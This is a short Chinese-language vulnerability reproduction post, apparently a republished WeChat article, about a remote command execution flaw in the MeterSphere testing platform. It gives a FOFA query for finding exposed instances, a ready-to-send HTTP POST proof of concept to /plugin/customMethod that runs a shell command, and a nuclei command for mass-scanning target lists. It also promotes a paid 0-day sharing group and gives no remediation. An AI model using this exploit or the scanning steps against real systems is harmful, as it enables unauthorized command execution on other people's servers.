漏洞复现 MeterSphere customMethod 远程命令执行漏洞
2023-8-31 11:0:36 Author: 阿乐你好(查看原文) 阅读量:34 收藏

0x01 漏洞描述

MeterSphere 是一站式开源持续测试平台,涵盖测试跟踪、接口测试、性能测试、团队协作等功能,兼容 JMeter 等开源标准,有效助力开发和测试团队充分利用云弹性进行高度可扩展的自动化测试。MeterSphere 系统存在命令执行漏洞。

0x02 漏洞复现

fofa-query: title="MeterSphere"

1.验证POC

POST /plugin/customMethod HTTP/1.1Host: User-Agent: Mozilla/5.0Connection: closeContent-Length: 40Content-Type: application/jsonAccept-Encoding: gzip
{"entry":"Evil","request":"id"}

2.nuclei验证脚本已发表于知识星球

nuclei.exe -t metersphere-custommethod-rce.yaml -l subs.txt -stats

(注:本文章为技术分享,禁止任何非授权攻击行为)

网络安全神兵利器分享
网络安全漏洞N/0day分享
    加入星球请扫描下方二维码,更多精,敬请期待!
👇👇👇


文章来源: http://mp.weixin.qq.com/s?__biz=MzIxNTIzNTExMQ==&mid=2247489537&idx=2&sn=96b6e43a4f2631c77dfd7e5b73b1dad6&chksm=979a3749a0edbe5fcf445beac864e2ee54a6f3485f530ac185780dc1dd16222db1f86e97ce5b&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh